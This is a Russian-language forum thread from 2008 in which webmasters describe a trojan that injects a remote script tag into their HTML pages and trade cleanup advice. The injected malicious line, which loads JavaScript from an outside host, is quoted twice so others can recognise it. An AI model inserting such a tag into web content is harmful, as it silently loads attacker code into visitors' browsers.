Вирус некая "модификация-en" - абсолютно новый и неубиваемый (на 09.01.2008)

12
[Удален]
1801

Господа, cтолкнулся с новым троянским вирусом.. что ни делал - не могу избавится от него.

Вирус цыпляет к любой HTML cтранице на сервере строку кода:

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

В следствии этого сайты в броузерах (особенно Explorer7) - загружаются развалеными (как будто неисправный HTML код).

Касперский с самыми последними обновлениями обнаружил этот вирус, но ничего с ним не делает - его нет в базе вирусов (!!!). По похожести выдаёт из базы вирус модификации-af:

"Троянская программа, написанная на языке JavaScript. Модифицирует HTML-страницу таким образом, чтобы при ее показе браузер Internet Explorer незаметно для пользователя скачивал какой-либо исполняемый файл и запускал его на выполнение."

Что делать с этим - Каспер не знает..

В результате - ничего нельзя с ним поделать.. Что подскажите?

Angelo
На сайте с 01.01.2007
Offline
125
#1

Aliott, попробывать найти и удалить его вручную. Посмотреть есть ли он в автозагрузке.

Pol Fransheski
На сайте с 27.12.2006
Offline
80
#2

Отошлите ссылку на сайт с вирусом в лабараторию Касперского.

Думаю соответствующие обновления не заставят себя долго ждать.

Б
На сайте с 07.07.2007
Offline
46
#3

Пару раз так же сталкивался с вирусами, которые даже не детектились каспером. Отправлял просто письмо с вирусом на ящик лаборатории. Добавляли в базы очень оперативно. Так что первым делом отправляйте касперскому, а потом на форуме рассказывайте :)

MyOST
На сайте с 22.01.2006
Offline
559
#4
Aliott:
(особенно Explorer7)

а сами им пользуетесь?

Вообще - для троянов, а точнее против них, у меня стоит http://www.free-av.de/ - советую

Блог (http://seom.info/) | Ты уже SEO профессионал? (http://www.key-collector.ru/) Развиваем семантику более 8 лет! ()
O
На сайте с 11.05.2005
Offline
172
#5

1) Меняем пароли на ftp доступа к сайту (пароли уже ушли - тут ничего не попишешь);

2) Больше не храним их в разных прогах типа Тотал Коммандер и т.п. - а забиваем ручками во время сессий;

3) Редактируем странички на предмет удаления вредоносного джавика и перезаливаем сайт.

Tj93
На сайте с 23.07.2007
Offline
176
#6

Opeth и еще переходим с ИЕ И Аськи на Оперу и qip

Ссылки навсегда от создателей Miralinks! (http://gogetlinks.net/register_user.php?inv=5jktm0)
Б
На сайте с 07.07.2007
Offline
46
#7
Opeth:
забиваем ручками во время сессий

Можно и всякие аытозаполнители форм использовать тот же робоформ, портативная версия тоже удобна. Главное в браузере запретить сохранение паролей. Ну и само собой нигде в ftp клиентах не сохранять. Простые правило, но лень намного сильнее и чаще одерживает победу.

auStern
На сайте с 30.03.2007
Offline
167
#8

Блиин, у меня тоже самое, я уже создавал такую тему в разделе Вэб-строительство, тогда думал, что у меня вирус прописался на сайтах, оказывается вирус сидит на компьютере. Вставляет код во все страницы, загружаемых браузером (У меня Mozilla Firefox 2), вот код который вставился в текущую страницу

<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js_______"></SCRIPT>

И самое главное, что он периодически меняется, блокировал до этого в фаерволе, у меня Outpost в рекламе и в плагине Blockpost, уже 4 адреса заблокировал...

Безтолковый NOD32 ничего не находит, вообще не нравится мне этот антивирус, даже если и находит, то не удаляет, уже все настройки перепроверил.

Кто может помочь, как оперативно решить эту проблему? Каперский вещь хорошая, но на мою ОС он не ставиться...

Пожалуйста, буду рад поддержке.

[Удален]
#9
MyOST:
а сами им пользуетесь?

нет не пользуюсь.. но проверяю как работают разработаные сайты во всех основных браузерах.

[Удален]
#10
auStern:
Каперский вещь хорошая, но на мою ОС он не ставиться...

.. но и он тут бесполезен. Каспер просто ничего не знает про этот вирус.. и как следствие не обезвреживает его.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий